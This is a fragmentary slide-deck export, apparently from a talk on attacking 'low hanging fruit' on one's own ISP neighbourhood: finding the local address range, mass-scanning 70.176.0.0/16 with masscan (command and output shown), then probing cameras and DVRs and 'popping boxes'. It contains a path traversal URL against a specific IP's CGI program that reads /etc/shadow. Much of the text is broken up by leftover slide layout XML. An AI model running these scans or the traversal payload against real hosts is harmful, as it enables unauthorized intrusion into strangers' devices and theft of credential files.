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c15e8070b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c15e8070b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15e8070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15e8070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c15e8070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c15e8070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c15e8070b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c15e8070b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c15e8070b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c15e8070b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15e8070b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15e8070b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c15e8070b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c15e8070b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c15e8070b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c15e8070b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15e8070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15e8070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15e8070b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15e8070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15e8070b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15e8070b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15e8070b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15e8070b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c15e8070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c15e8070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15e8070b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15e8070b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c15e8070b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c15e8070b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c15e8070b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c15e8070b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Your Local Internets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guide for monkeys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5.5 Formatting Datas….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202" cy="1815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2301750" y="3533075"/>
            <a:ext cx="2714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Assume I did the same for HTTPS...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87900" y="108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6: Code Your Attack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4325"/>
            <a:ext cx="8774725" cy="4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7: Automate that shit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201" cy="2766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8: Reap the rewards of your fruit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8" y="1338525"/>
            <a:ext cx="820102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87900" y="202900"/>
            <a:ext cx="83682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9: Look at the weird stuff on your local CDIR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7162521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10: Pop some boxes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3491166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4673450" y="1763025"/>
            <a:ext cx="36171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Classic file abuse in CGI program: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http://70.176.24.71:81/cgi-bin/wapopen?B1=OK&amp;NO=CAM_16&amp;REFRESH_TIME=Auto_00&amp;FILECAMERA=../../../../etc/shadow&amp;REFRESH_HTML=auto.htm&amp;ONLOAD_HTML=onload.htm&amp;STREAMING_HTML=streaming.htm&amp;NAME=NNNNN&amp;PWD=PPPPP&amp;PIC_SIZE=SSS_SIZE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let’s go after the local net here...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100" y="1226575"/>
            <a:ext cx="4439074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66" name="Google Shape;166;p29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going after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ISP’s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Externally facing IP Addresses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Cameras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DVR’s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Whatever else is out there with an IP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775" y="771275"/>
            <a:ext cx="2262357" cy="301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113750" y="350850"/>
            <a:ext cx="4709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tools are needed?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25" y="439225"/>
            <a:ext cx="2520901" cy="395125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085000" y="1307800"/>
            <a:ext cx="4709100" cy="22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Linux or Windows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Masscan or nmap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words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Arin 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Attacking morons and low hanging fruit</a:t>
            </a:r>
            <a:endParaRPr sz="2400"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exactly are we doing?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850" y="474225"/>
            <a:ext cx="461962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What’s my ip?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9" y="1144125"/>
            <a:ext cx="5677901" cy="389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What’s the range?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25" y="1144125"/>
            <a:ext cx="38766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303100" y="1833000"/>
            <a:ext cx="22317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So 70.176.0.0/16 is the address range, roughly 64k hosts.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Scan!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387900" y="1144125"/>
            <a:ext cx="72030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root@joesucks:~# masscan -p80,443,8080,8443,81,4444,4443,8888 70.176.0.0/16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Starting masscan 1.0.6 (http://bit.ly/14GZzcT) at 2019-1-4 19:59:13 GMT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-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth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Initiating SYN Stealth Scan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Scanning 65536 hosts [8 ports/host]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8080/tcp on 70.176.20.39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443/tcp on 70.176.9.155 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443/tcp on 70.176.155.105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8080/tcp on 70.176.14.202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443/tcp on 70.176.38.75 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81/tcp on 70.176.215.126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443/tcp on 70.176.229.8 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443/tcp on 70.176.215.6 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8080/tcp on 70.176.26.63                             	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Discovered open port 8080/tcp on 70.176.153.41     	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Visit / Probe - this can take forever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50" y="1289525"/>
            <a:ext cx="5876410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5: Format Datas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58293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